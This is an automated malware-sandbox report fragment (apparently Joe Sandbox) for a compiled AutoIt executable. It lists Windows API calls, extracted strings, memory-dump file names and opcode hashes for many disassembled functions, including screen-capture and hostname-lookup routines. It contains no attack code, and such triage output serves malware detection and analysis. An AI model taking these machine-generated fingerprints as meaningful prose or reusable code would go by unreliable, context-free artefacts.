                                                          • __wsplitpath.LIBCMT ref: 003FDA10
                                                          • _wcscat.LIBCMT ref: 003FDA28
                                                          • _wcscat.LIBCMT ref: 003FDA3A
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003FDA4F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FDA63
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003FDA7B
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 003FDA95
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003FDAA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: 1b9022f9ac20364b99ce7b5cb7b49f68d935ba6d2f12e5b49477b00c8899b97f
                                                          • Instruction ID: 46337ace03a17beb3ffd3a62981eab4a805cb647e64997c325a89050dbcb57b4
                                                          • Opcode Fuzzy Hash: 1b9022f9ac20364b99ce7b5cb7b49f68d935ba6d2f12e5b49477b00c8899b97f
                                                          • Instruction Fuzzy Hash: A781B4715043499FCB22DFA4C848ABBB7E9AF89310F15482EF989CB251E770DD45CB52
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0041C1FC
                                                          • GetFocus.USER32 ref: 0041C20C
                                                          • GetDlgCtrlID.USER32(00000000), ref: 0041C217
                                                          • _memset.LIBCMT ref: 0041C342
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0041C36D
                                                          • GetMenuItemCount.USER32(?), ref: 0041C38D
                                                          • GetMenuItemID.USER32(?,00000000), ref: 0041C3A0
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0041C3D4
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0041C41C
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0041C454
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0041C489
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 29cabfcaa90144834676862adca0c4aa9f6d66e2748c6d914a0d87db557084e4
                                                          • Instruction ID: 03172cf9e74bae6566fd177a55e99afab32005fc4a3709ac9207628358a64647
                                                          • Opcode Fuzzy Hash: 29cabfcaa90144834676862adca0c4aa9f6d66e2748c6d914a0d87db557084e4
                                                          • Instruction Fuzzy Hash: 3181AE70648311AFD710CF14CC94ABBBBE9FB88714F00892EF99597291D734D885CB9A
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 0040738F
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0040739B
                                                          • CreateCompatibleDC.GDI32(?), ref: 004073A7
                                                          • SelectObject.GDI32(00000000,?), ref: 004073B4
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00407408
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00407444
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00407468
                                                          • SelectObject.GDI32(00000006,?), ref: 00407470
                                                          • DeleteObject.GDI32(?), ref: 00407479
                                                          • DeleteDC.GDI32(00000006), ref: 00407480
                                                          • ReleaseDC.USER32(00000000,?), ref: 0040748B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: dde9fec146f312b969e47f658c34a1b3747ba3f4bd2a26ede3716fad17845c35
                                                          • Instruction ID: d9ae33f1c50451d5aa4679b876c58dd655a6e1cc7fede934b5505800a0eb65e1
                                                          • Opcode Fuzzy Hash: dde9fec146f312b969e47f658c34a1b3747ba3f4bd2a26ede3716fad17845c35
                                                          • Instruction Fuzzy Hash: E6515871A04209EFDB14CFA8CC84EAFBBB9EF48310F14842EF95AA7251C735A945CB54
                                                          APIs
                                                            • Part of subcall function 003B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00396B0C,?,00008000), ref: 003B0973
                                                            • Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00396BAD
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00396CFA
                                                            • Part of subcall function 0039586D: _wcscpy.LIBCMT ref: 003958A5
                                                            • Part of subcall function 003B363D: _iswctype.LIBCMT ref: 003B3645
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
                                                          • Opcode ID: 9dfd0cf2f83a4a610d4bd84201e43871378fd84b6d7c1ea072c03245235ab453
                                                          • Instruction ID: 1333cb36dfd7224a2b72863a304db02e42a8315ad253f8ea922177ef1a9cbd7d
                                                          • Opcode Fuzzy Hash: 9dfd0cf2f83a4a610d4bd84201e43871378fd84b6d7c1ea072c03245235ab453
                                                          • Instruction Fuzzy Hash: C0029D311083419FCB26EF24C891EAFBBE5EF95354F10492DF4999B2A2DB30D949CB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F2D50
                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003F2DDD
                                                          • GetMenuItemCount.USER32(00455890), ref: 003F2E66
                                                          • DeleteMenu.USER32(00455890,00000005,00000000,000000F5,?,?), ref: 003F2EF6
                                                          • DeleteMenu.USER32(00455890,00000004,00000000), ref: 003F2EFE
                                                          • DeleteMenu.USER32(00455890,00000006,00000000), ref: 003F2F06
                                                          • DeleteMenu.USER32(00455890,00000003,00000000), ref: 003F2F0E
                                                          • GetMenuItemCount.USER32(00455890), ref: 003F2F16
                                                          • SetMenuItemInfoW.USER32(00455890,00000004,00000000,00000030), ref: 003F2F4C
                                                          • GetCursorPos.USER32(?), ref: 003F2F56
                                                          • SetForegroundWindow.USER32(00000000), ref: 003F2F5F
                                                          • TrackPopupMenuEx.USER32(00455890,00000000,?,00000000,00000000,00000000), ref: 003F2F72
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F2F7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 3993528054-0
                                                          • Opcode ID: cfa756fbb2ecdc7f45f0c4e9ffc792a5d90a0d449b7c3a4680f9e0de1534b74a
                                                          • Instruction ID: eb5382105d2ade62571755b78257d6f4b8e9360c06fa3790c4145397dc2b66fe
                                                          • Opcode Fuzzy Hash: cfa756fbb2ecdc7f45f0c4e9ffc792a5d90a0d449b7c3a4680f9e0de1534b74a
                                                          • Instruction Fuzzy Hash: 0371C170600209FEEB229F54DC45FBBBF69FB04364F204226F725AA1E1C7715820DB94
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 004088D7
                                                          • CoInitialize.OLE32(00000000), ref: 00408904
                                                          • CoUninitialize.OLE32 ref: 0040890E
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00408A0E
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00408B3B
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00422C0C), ref: 00408B6F
                                                          • CoGetObject.OLE32(?,00000000,00422C0C,?), ref: 00408B92
                                                          • SetErrorMode.KERNEL32(00000000), ref: 00408BA5
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408C25
                                                          • VariantClear.OLEAUT32(?), ref: 00408C35
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID: ,,B
                                                          • API String ID: 2395222682-1878338948
                                                          • Opcode ID: 65372904e903f8091652746d64af64ffba3dba5ae644e03a4af62ee12aaf6e9c
                                                          • Instruction ID: 44b8c5ad23da220bb207cd74f03764e2fd2a455ffa5dfa0ca86ab90f7ebe48c2
                                                          • Opcode Fuzzy Hash: 65372904e903f8091652746d64af64ffba3dba5ae644e03a4af62ee12aaf6e9c
                                                          • Instruction Fuzzy Hash: FBC14AB1608305AFD700DF28C98496BB7E9FF89348F00492EF5899B291DB75ED06CB56
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 34b5cf7450f283686ae9fee27d203dac7528f5a6d64666339abef6c10a34a37b
                                                          • Instruction ID: ad7c0056af3f45084d2996b4a794821ce3c971bd017cab7758534b9806893db4
                                                          • Opcode Fuzzy Hash: 34b5cf7450f283686ae9fee27d203dac7528f5a6d64666339abef6c10a34a37b
                                                          • Instruction Fuzzy Hash: 37418D3150434A8BDF25EF10D856AEF3760BF11304F244816FC551B692DBB89D9BCBA4
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003CE2A0,00000010,?,Bad directive syntax error,0041F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003EF7C2
                                                          • LoadStringW.USER32(00000000,?,003CE2A0,00000010), ref: 003EF7C9
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                          • _wprintf.LIBCMT ref: 003EF7FC
                                                          • __swprintf.LIBCMT ref: 003EF81E
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003EF88D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: 05b4191d43700cf36fb8c0c3df7f9f376b1350d3d8e0def01a3538287bf6a41b
                                                          • Instruction ID: f77973e87111c6f335c137f4d017c915e81f4bbf93dee7b2e6213287b6985bb7
                                                          • Opcode Fuzzy Hash: 05b4191d43700cf36fb8c0c3df7f9f376b1350d3d8e0def01a3538287bf6a41b
                                                          • Instruction Fuzzy Hash: BC215E3291021AEFDF13EF90CC4AFEE7779BF18300F04446AF5156A0A2EA71A658DB55
                                                          APIs
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                            • Part of subcall function 00397924: _memmove.LIBCMT ref: 003979AD
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003F5330
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003F5346
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F5357
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003F5369
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003F537A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 5a24a5aa243c5f94a4350cf2c7036c739408c40103e4fe5dca8e206739efc353
                                                          • Instruction ID: 2355abc19c012170e3e6cce65621ea5dc38d06d25a201a9adbe82cd356d3114e
                                                          • Opcode Fuzzy Hash: 5a24a5aa243c5f94a4350cf2c7036c739408c40103e4fe5dca8e206739efc353
                                                          • Instruction Fuzzy Hash: B111C431AA412D79EB61B775DC5AFFFBBBCEB91B40F10042AB501A60D1EEA00D04C9A4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: fc77a56dd6f645054b6d1002748f6975cdd222358451be2222fb052e8ad59d11
                                                          • Instruction ID: e99f3e9687a4d52a903be89e9948cf30b3c42d58d8bddde79a74dc03cdde073f
                                                          • Opcode Fuzzy Hash: fc77a56dd6f645054b6d1002748f6975cdd222358451be2222fb052e8ad59d11
                                                          • Instruction Fuzzy Hash: CC1127315041086FCB16BB309C4AEEF77BCEF41311F0442BAF65596091FF70CA8A8A54
                                                          APIs
                                                          • timeGetTime.WINMM ref: 003F4F7A
                                                            • Part of subcall function 003B049F: timeGetTime.WINMM(?,7707B400,003A0E7B), ref: 003B04A3
                                                          • Sleep.KERNEL32(0000000A), ref: 003F4FA6
                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 003F4FCA
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003F4FEC
                                                          • SetActiveWindow.USER32 ref: 003F500B
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003F5019
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003F5038
                                                          • Sleep.KERNEL32(000000FA), ref: 003F5043
                                                          • IsWindow.USER32 ref: 003F504F
                                                          • EndDialog.USER32(00000000), ref: 003F5060
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: 1cc6e17c0ee6bfc5a5fb012e924eccc342cc9048a91078b72782b791b08b631e
                                                          • Instruction ID: f7d24506858e657567efa58f99c293438bd48dde92d9d19e5f42ec4c6264decc
                                                          • Opcode Fuzzy Hash: 1cc6e17c0ee6bfc5a5fb012e924eccc342cc9048a91078b72782b791b08b631e
                                                          • Instruction Fuzzy Hash: DF219D7024570EBFE7129F20FC88A763B69EB4474AF465138F209822B2DB718D458F69
                                                          APIs
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • CoInitialize.OLE32(00000000), ref: 003FD5EA
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003FD67D
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 003FD691
                                                          • CoCreateInstance.OLE32(00422D7C,00000000,00000001,00448C1C,?), ref: 003FD6DD
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003FD74C
                                                          • CoTaskMemFree.OLE32(?,?), ref: 003FD7A4
                                                          • _memset.LIBCMT ref: 003FD7E1
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 003FD81D
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003FD840
                                                          • CoTaskMemFree.OLE32(00000000), ref: 003FD847
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003FD87E
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 003FD880
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 6b6ad1485b57a9351b28eb86cfa64d07faa97b17cb71e64665819f7e2fed6ade
                                                          • Instruction ID: b05605807435e452d30293e49245339ca7a0ab8a089164529dcc3b7415808a7f
                                                          • Opcode Fuzzy Hash: 6b6ad1485b57a9351b28eb86cfa64d07faa97b17cb71e64665819f7e2fed6ade
                                                          • Instruction Fuzzy Hash: 1EB10C75A00109AFDB05DFA8C889EAEBBB9FF49314F148469F909DB261DB30ED45CB50
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 003EC283
                                                          • GetWindowRect.USER32(00000000,?), ref: 003EC295
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 003EC2F3
                                                          • GetDlgItem.USER32(?,00000002), ref: 003EC2FE
                                                          • GetWindowRect.USER32(00000000,?), ref: 003EC310
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 003EC364
                                                          • GetDlgItem.USER32(?,000003E9), ref: 003EC372
                                                          • GetWindowRect.USER32(00000000,?), ref: 003EC383
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 003EC3C6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 003EC3D4
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003EC3F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003EC3FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: fd30b40a7839f620cd5b1228fe01938e626fbf01364b7c6600122f21019fafc6
                                                          • Instruction ID: 7ef6f40f86c49600902a64aff56e19bbf386d6dc87b51043618e2cf4b175fa1b
                                                          • Opcode Fuzzy Hash: fd30b40a7839f620cd5b1228fe01938e626fbf01364b7c6600122f21019fafc6
                                                          • Instruction Fuzzy Hash: E5514F71B10205AFDB19CFA9DD89AAEBBB6FB88310F14823DF515D62D0D7709D058B14
                                                          APIs
                                                            • Part of subcall function 00391B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00392036,?,00000000,?,?,?,?,003916CB,00000000,?), ref: 00391B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003920D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 0039216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 003CBCA6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBCD7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBCEE
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003916CB,00000000,?,?,00391AE2,?,?), ref: 003CBD0A
                                                          • DeleteObject.GDI32(00000000), ref: 003CBD1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
